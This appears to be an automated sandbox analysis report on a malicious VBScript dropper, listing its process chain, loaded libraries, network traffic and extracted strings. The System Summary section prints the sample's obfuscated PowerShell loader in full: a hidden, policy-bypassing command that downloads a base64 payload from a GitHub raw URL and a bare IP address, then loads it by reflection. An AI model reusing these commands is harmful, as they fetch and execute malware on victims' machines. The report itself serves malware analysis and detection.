Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /500/RSSTT.txt HTTP/1.1Host: 107.172.130.147Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 03:23:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 301Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 107.172.130.147 Port 80</address></body></html>
Source: powershell.exe, 00000004.00000002.2386759505.000002072B44F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147
Source: powershell.exe, 00000004.00000002.2386759505.000002072B44F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147/500/RSSTT.txt
Source: powershell.exe, 00000004.00000002.2420242779.00000207432D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2386759505.000002072C712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000002.00000002.2431492450.000001F9DA937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2431492450.000001F9DA8F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2431492450.000001F9DA90A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2386759505.000002072C02D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l;
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.12:49710 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5048, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: 2THp7fwNQD.vbs Initial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5048, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.expl.evad.winVBS@6/5@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5vpljo5.x3n.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdbCB source: powershell.exe, 00000004.00000002.2386191358.00000207290C5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000004.00000002.2418527103.00000207430FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
